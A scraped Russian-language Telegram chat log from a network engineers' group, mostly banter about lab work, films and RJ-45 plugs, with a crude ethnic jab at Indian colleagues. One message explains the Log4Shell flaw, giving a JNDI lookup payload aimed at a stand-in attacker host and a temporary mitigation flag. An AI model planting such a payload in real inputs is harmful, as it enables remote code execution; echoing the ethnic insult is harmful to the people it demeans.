Size: a a a

2021 December 10

ИZ

Илья Z in linkmeup_chat
Даже на ссие лабе никому не было дела до часов
источник

ИZ

Илья Z in linkmeup_chat
Индусы конченые
источник

N

Nikolay in linkmeup_chat
написал что имел место харрасмент?
источник

ИZ

Илья Z in linkmeup_chat
я не знаю как по английски пишется "долбоебы"
источник

I

Innokentiy in linkmeup_chat
dolboeby
источник

LM

Loxmatiy Mamont in linkmeup_chat
dolboeby, sir
источник

E

Eugene in linkmeup_chat
hooligany
источник

E

Eugene in linkmeup_chat
источник

E

Eugene in linkmeup_chat
(тот момент не нашел, сорян)
источник

ИZ

Илья Z in linkmeup_chat
хороший фильм, надо пересмотреть
источник

$

$p33d_$n@i1 in linkmeup_chat
У половины интернета нашли выполнение произвольного кода через Log4j.

Выглядит это так:

1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.

Гроб. Гроб. Кладбище.
Временный фикс: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”

Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
источник

N

Nardis in linkmeup_chat
Ключевой вопрос №4.
источник

N

Nardis in linkmeup_chat
источник

N

Nardis in linkmeup_chat
источник

N

Nardis in linkmeup_chat
источник

N

Nardis in linkmeup_chat
источник
2021 December 11

J

John Roe in linkmeup_chat
источник

NK

ID:0 in linkmeup_chat
Найдена причина, из-за которой мы продолжаем хранить эти царапающие пальцы заглушки.
источник

AG

A. Golets in linkmeup_chat
TORX болт/шуруп/хзкакеготочно это однако
источник

F

Fro in linkmeup_chat
Я заглушкой всегда обжимал настенные розетки ржи-45
источник